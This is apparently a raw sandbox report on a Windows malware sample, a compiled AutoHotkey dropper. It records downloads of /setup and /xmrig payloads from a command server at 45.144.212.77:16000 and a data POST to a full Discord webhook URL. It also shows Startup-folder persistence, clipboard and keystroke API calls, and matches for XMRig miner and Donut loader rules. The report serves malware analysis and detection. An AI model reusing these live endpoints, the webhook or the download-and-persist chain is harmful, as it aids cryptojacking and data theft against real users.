        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=A832951E-6F73-4E67-8618-6335829FCBCB&user=m-87c0d7fd4110479b90e592644fef2efa HTTP/1.1Host: api.msn.com
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=510BBDB7-3599-436D-820F-2ABDE7F9F873&user=m-e7a31ade3d684c0e97c45c78160337e0 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2952DDCC-108A-4E23-AF85-28774DAFF838&user=m-916b169b80db4bcaa1daf96135f22620 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2FFE0440-7220-4EB4-8A34-B544478D19A2&user=m-0e31ef8bffd841ec982c5646be013e0e HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=8FE6B6FE-A76C-4FD2-8505-C47EF2E5C176&user=m-8914b0e0329445caa4090e2130a4ca07 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 45.144.212.77:16000
        Source: global trafficHTTP traffic detected: GET /xmrig HTTP/1.1Host: 45.144.212.77:16000User-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /line/8.46.123.189?fields=countryCode HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /xmrig HTTP/1.1Host: 45.144.212.77:16000User-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficDNS traffic detected: DNS query: discord.com
        Source: global trafficDNS traffic detected: DNS query: checkip.amazonaws.com
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: unknownHTTP traffic detected: POST /api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqaly5RkRwMMGA9hPd0zvz0yH HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 79Host: discord.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Mar 2025 15:04:22 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1740841464x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LdVxsXtXuNT%2BpPSsoeCxbtxWYBFPJ%2F8JSqJqOv9WhUx0WcQX4Jv%2BdZn%2FeJ0fqA0MBYv30tvlDlAZU82o289YsciYVS%2BAdiqTtULQoH1AZUUHmwwU1YWeZN7N%2Flkb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7caf5529e9397845fe8c5c3bbc019ad19603bc50-1740841462; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneReporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Mar 2025 15:04:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1740841466x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBWF0YjFXDLy6SBiPs%2F1dI4iDh6fPWv%2FtuyHhw%2BxvtR6cvxDijX07W2ZkkWRLou5qpQ3G2nBrbcgjpMApHr40wQjirLgNDQLJZK%2BtGNxRIeJismZ5A8Pd5pCF4rS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6af3c8396a0443402b19cb89374ec0cca82a218d-1740841465; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneReporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
        Source: 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1365187542.0000000000A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/
        Source: reg.exe, 0000000E.00000002.1388357406.000001C5FC600000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1511345993.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/client
        Source: 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/clientreg
        Source: runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/clientxq
        Source: 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000000.1384821654.000000014012F000.00000002.00000001.01000000.00000006.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/setup
        Source: 1ZXaFij.exe, 00000002.00000002.1375492399.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/setup(
        Source: runps.exe, 0000000C.00000002.1398553534.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/setuphttp://45.144.212.77:16000/clientallen
        Source: 1ZXaFij.exe, 00000002.00000002.1375597639.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1373942891.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.144.212.77:16000/setuphttp://45.144.212.77:16000/clientttp://45.144.212.77:16000/setup:
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B7A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A5751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B7A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A5751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://autohotkey.com
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://autohotkey.comCould
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398847412.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
        Source: runps.exe, 0000000C.00000002.1398553534.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397900366.00000000009F6000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.00000000009BF000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqal
        Source: runps.exe, 0000000C.00000002.1398847412.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397448544.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com:443/api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzR
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A5979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000B.00000002.1627613856.00000222B8678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: runps.exe, 0000000C.00000002.1399090382.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se
        Source: runps.exe, 0000000C.00000003.1396996325.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1399090382.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o64374.ingest.sentry.io;
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000011.00000002.1485108514.00000203AA01B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
        Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49917 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49976 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49988 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49989 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49993 version: TLS 1.2
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400076D0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,2_2_00000001400076D0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A5120 EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,2_2_00000001400A5120
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400071A0 GlobalAlloc,GlobalLock,GlobalFree,EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,2_2_00000001400071A0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400075B0 GetClipboardFormatNameW,GetClipboardData,2_2_00000001400075B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140030A50 GetSystemMetrics,GetSystemMetrics,GetDC,GetLastError,DestroyIcon,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,GetDC,CreateCompatibleDC,GetIconInfo,GetObjectW,CreateCompatibleBitmap,SelectObject,CreateSolidBrush,FillRect,DeleteObject,DrawIconEx,SelectObject,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,DestroyIcon,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetLastError,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,2_2_0000000140030A50
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400225F0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,2_2_00000001400225F0

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000017.00000000.1514246330.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Sample or dropped binary is a compiled AutoHotkey binary
        Source: C:\Users\user\Desktop\1ZXaFij.exeWindow found: window name: AutoHotkeyJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeWindow found: window name: AutoHotkeyJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140026A7C: GetDriveTypeW,CreateFileW,DeviceIoControl,CloseHandle,2_2_0000000140026A7C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW,2_2_0000000140063EB0
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004810C2_2_000000014004810C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400462C02_2_00000001400462C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000172D2_2_000000014000172D
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004780C2_2_000000014004780C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400768502_2_0000000140076850
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400058B02_2_00000001400058B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140034FE82_2_0000000140034FE8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400140202_2_0000000140014020
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014002C0502_2_000000014002C050
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D60542_2_00000001400D6054
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400370702_2_0000000140037070
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004F07A2_2_000000014004F07A
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001E0A82_2_000000014001E0A8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400151002_2_0000000140015100
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004C1202_2_000000014004C120
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004D1402_2_000000014004D140
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400352702_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400492D82_2_00000001400492D8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400302F02_2_00000001400302F0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400CE3CC2_2_00000001400CE3CC
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400124602_2_0000000140012460
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D64E82_2_00000001400D64E8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C650C2_2_00000001400C650C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001F5302_2_000000014001F530
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400195302_2_0000000140019530
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400395402_2_0000000140039540
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400B25702_2_00000001400B2570
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000256E2_2_000000014000256E
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014008C5802_2_000000014008C580
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A65B02_2_00000001400A65B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001B5C02_2_000000014001B5C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400526102_2_0000000140052610
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000262E2_2_000000014000262E
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C67102_2_00000001400C6710
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400027282_2_0000000140002728
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C875C2_2_00000001400C875C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400347902_2_0000000140034790
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400567D02_2_00000001400567D0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000F7E02_2_000000014000F7E0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400507F02_2_00000001400507F0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D08102_2_00000001400D0810
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400368102_2_0000000140036810
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400378402_2_0000000140037840
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400278802_2_0000000140027880
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400158982_2_0000000140015898
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014002F8B02_2_000000014002F8B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001D8D02_2_000000014001D8D0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400CE8D82_2_00000001400CE8D8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C691C2_2_00000001400C691C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D49302_2_00000001400D4930
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400539702_2_0000000140053970
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003F9B02_2_000000014003F9B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A09F02_2_00000001400A09F0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140008A102_2_0000000140008A10
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400ACA302_2_00000001400ACA30
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C7A482_2_00000001400C7A48
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140030A502_2_0000000140030A50
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001FA502_2_000000014001FA50
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C6B202_2_00000001400C6B20
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C8B602_2_00000001400C8B60
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D6B682_2_00000001400D6B68
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004FBA62_2_000000014004FBA6
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140057BC02_2_0000000140057BC0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140051C042_2_0000000140051C04
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400BCC202_2_00000001400BCC20
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140016C202_2_0000000140016C20
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000AC302_2_000000014000AC30
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140041C802_2_0000000140041C80
